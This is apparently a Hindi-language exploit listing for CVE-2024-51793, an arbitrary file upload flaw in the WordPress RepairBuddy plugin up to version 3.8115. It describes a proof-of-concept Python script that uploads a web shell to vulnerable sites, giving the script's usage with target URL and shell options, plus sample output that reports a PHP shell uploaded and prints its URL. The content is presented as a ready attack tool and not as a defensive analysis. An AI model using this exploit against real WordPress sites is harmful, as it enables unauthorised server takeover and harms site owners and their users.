
वर्डप्रेस RepairBuddy प्लगइन <= 3.8115 - मनमानी फ़ाइल अपलोड भेद्यता
CVE-ID: CVE-2024-51793
प्रकाशित: 2024-11-11
अपडेट: 2024-11-11
शीर्षक: WordPress RepairBuddy प्लगइन <= 3.8115 - मनमाना फ़ाइल अपलोड भेद्यता
विवरण:
Webful Creations Computer Repair Shop में खतरनाक प्रकार के फ़ाइल के अप्रतिबंधित अपलोड की भेद्यता वेब सर्वर पर वेब शेल अपलोड करने की अनुमति देती है। यह समस्या Computer Repair Shop को प्रभावित करती है: n/a से 3.8115 तक।
CWE:
CVSS:
यह WordPress RepairBuddy प्लगइन संस्करण <= 3.8115 में मनमाना फ़ाइल अपलोड भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट शोषण है। यह शोषण एक हमलावर को कमजोर सर्वर पर वेब शेल अपलोड करने की अनुमति देता है।
requests लाइब्रेरी (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
शोषण द्वारा: Nxploited, Khaled Alenazi